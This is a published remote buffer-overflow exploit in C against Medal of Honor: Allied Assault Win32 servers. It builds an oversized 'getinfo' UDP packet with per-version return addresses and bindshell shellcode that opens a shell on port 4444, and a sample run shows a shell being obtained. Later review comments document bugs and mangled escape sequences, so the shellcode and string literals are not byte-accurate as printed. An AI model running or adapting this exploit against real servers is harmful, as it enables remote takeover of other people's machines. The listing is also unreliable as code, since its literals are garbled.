# Title : Medal of Honor (getinfo) Remote Buffer Overflow Exploit
# Published : 2006-05-10
# Author : RunningBon
/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon
Please use this responsibly, as I am not responsible for any damage you cause by using it.
IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com
Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
Example:
C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik
Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.
C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>
// One row of the version table: the name matched against argv[3] in main(),
// plus the two per-build values that Exploit() places into the datagram.
struct VersionStruct {
char *pName;        // version string, compared case-insensitively by main()
DWORD dwNewEIP;     // four bytes copied into the datagram directly after the filler
DWORD dwFillLength; // number of 'z' filler bytes written after the query header
};
// Table consulted by main() (lookup) and PrintUsage() (listing). Only these
// two entries exist; main() refuses any name that is not listed. Nothing in
// Exploit() checks dwFillLength against the size of its local buffer, so the
// table is trusted to keep the packet in bounds.
VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
//Add MOHAA:Breakthrough support
};
#pragma comment (lib, "ws2_32.lib")
// Port 4444 bindshell payload, appended by Exploit() after dwNewEIP.
// Exploit() copies sizeof(szShellcode) bytes, which includes the trailing NUL.
// NOTE(review): the escape sequences in this listing appear to have lost their
// backslashes in extraction, so the text below is not a byte-accurate rendering
// of the array and should not be used as a detection signature as printed.
unsigned char szShellcode[] =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x42"
"xecxeex81x83xebxfcxe2xf4xbex86x05xccxaax15x11x7e"
"xbdx8cx65xedx66xc8x65xc4x7ex67x92x84x3axedx01x0a"
"x0dxf4x65xdex62xedx05xc8xc9xd8x65x80xacxddx2ex18"
"xeex68x2exf5x45x2dx24x8cx43x2ex05x75x79xb8xcaxa9"
"x37x09x65xdex66xedx05xe7xc9xe0xa5x0ax1dxf0xefx6a"
"x41xc0x65x08x2exc8xf2xe0x81xddx35xe5xc9xafxdex0a"
"x02xe0x65xf1x5ex41x65xc1x4axb2x86x0fx0cxe2x02xd1"
"xbdx3ax88xd2x24x84xddxb3x2ax9bx9dxb3x1dxb8x11x51"
"x2ax27x03x7dx79xbcx11x57x1dx65x0bxe7xc3x01xe6x83"
"x17x86xecx7ex92x84x37x88xb7x41xb9x7ex94xbfxbdxd2"
"x11xbfxadxd2x01xbfx11x51x24x84xffxddx24xbfx67x60"
"xd7x84x4ax9bx32x2bxb9x7ex94x86xfexd0x17x13x3exe9"
"xe6x41xc0x68x15x13x38xd2x17x13x3exe9xa7xa5x68xc8"
"x15x13x38xd1x16xb8xbbx7ex92x7fx86x66x3bx2ax97xd6"
"xbdx3axbbx7ex92x8ax84xe5x24x84x8dxecxcbx09x84xd1"
"x1bxc5x22x08xa5x86xaax08xa0xddx2ex72xe8x12xacxac"
"xbcxaexc2x12xcfx96xd6x2axe9x47x86xf3xbcx5fxf8x7e"
"x37xa8x11x57x19xbbxbcxd0x13xbdx84x80x13xbdxbbxd0"
"xbdx3cx86x2cx9bxe9x20xd2xbdx3ax84x7exbdxdbx11x51"
"xc9xbbx12x02x86x88x11x57x10x13x3exe9xb2x66xeaxde"
"x11x13x38x7ex92xecxeex81";
// Prints a message and terminates the process via ExitProcess(). It never
// returns, so every `return 0;` that follows an Error() call in Exploit() is
// dead code. The exit code is 0 even on failure, so a calling script cannot
// distinguish an error from a normal run.
void Error(char *pString)
{
printf("[ERROR] %sn", pString); // literal as printed; the escape sequences in this listing are mangled
ExitProcess(0);
}
// Builds a single UDP datagram and sends it to pIP:iPort. Returns 1 when
// sendto() reports no error; the `return 0` paths are unreachable in practice
// because Error() terminates the process. The return value says nothing about
// what the target did with the datagram — only that it left this host.
//
// Datagram layout, in the order written below: szHeader without its NUL,
// pVersion->dwFillLength bytes of 'z', the 4 bytes of pVersion->dwNewEIP in
// the host's native byte order, then szShellcode including its NUL terminator.
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr; // not zeroed; only three fields are assigned below
char szHeader[] = "xffxffxffxffx02getinfo "; // literal as printed; escape sequences in this listing are mangled
char szBuffer[4096];
int iLen = 0;
WSAStartup(MAKEWORD(1, 1), &WSADATA); // return value is not checked
// Winsock reports socket() failure as INVALID_SOCKET; comparing with
// SOCKET_ERROR only works because -1 converts to the same all-ones value.
if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0; // unreachable: Error() exits the process
}
SockAddr.sin_addr.s_addr = inet_addr(pIP); // an INADDR_NONE result for a malformed address is not checked
SockAddr.sin_port = htons(iPort);           // iPort comes from atoi() in main() with no range check
SockAddr.sin_family = AF_INET;
printf("Building packet.n");
memset(szBuffer, 0, sizeof(szBuffer));
memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;
// No check that iLen + dwFillLength + sizeof(DWORD) + sizeof(szShellcode)
// stays within sizeof(szBuffer); this relies on the values in the Versions table.
memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;
memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD)); // raw copy, native byte order
iLen += sizeof(DWORD);
memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode)); // sizeof includes the trailing NUL
iLen += sizeof(szShellcode);
printf("Sending packet.n");
// One datagram only. The socket is never closed and WSACleanup() is never called.
if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0; // unreachable: Error() exits the process
}
printf("Packet sent.n");
return 1;
}
// Prints the program banner to stdout. The literals below are reproduced as
// printed in this listing; their escape sequences appear mangled (each line
// ends in a bare "n" rather than a newline escape).
void PrintWelcome()
{
printf(
"MoHAA Server Buffer overflow exploitn"
"Written by RunningBonn"
"E-Mail: runningbon@gmail.comn"
"IRC: irc.rizon.net #kikn"
"n"
);
}
// Prints the usage line (pPath is argv[0]) followed by every pName in the
// Versions table, one per line.
void PrintUsage(char *pPath)
{
printf("Usage: %s <IP> <Port> <Version Name>nn", pPath);
printf("Supported Version List:n");
// `int i` is compared with a size_t expression (signed/unsigned comparison).
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
printf("%sn", Versions[i].pName);
}
}
// Entry point. Expects argv[1] = IP address, argv[2] = port, argv[3] = a name
// from the Versions table. Returns 0 on every path that returns; an unknown
// version name is handled by Error(), which exits the process instead.
int main(int argc, char **argv)
{
VersionStruct *pVersion = NULL;
PrintWelcome();
if(argc < 4)
{
PrintUsage(argv[0]);
return 0;
}
// Case-insensitive lookup of argv[3] in the Versions table; stricmp is MSVC-specific.
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
if(!stricmp(argv[3], Versions[i].pName))
{
pVersion = &Versions[i];
break;
}
}
if(pVersion == NULL)
{
Error("Invalid version."); // exits the process; pVersion is non-NULL from here on
}
// argv[2] is converted with atoi() twice and is never range-checked; argv[1]
// is passed through to inet_addr() in Exploit() without validation.
printf("Attempting to exploit %s:%d, running version %s.n", argv[1], atoi(argv[2]), pVersion->pName);
// Exploit() only reports that sendto() did not fail; the message below does
// not indicate that anything happened on the target.
if(Exploit(argv[1], atoi(argv[2]), pVersion))
{
printf("Check for your shell on port 4444.n");
}
return 0;
}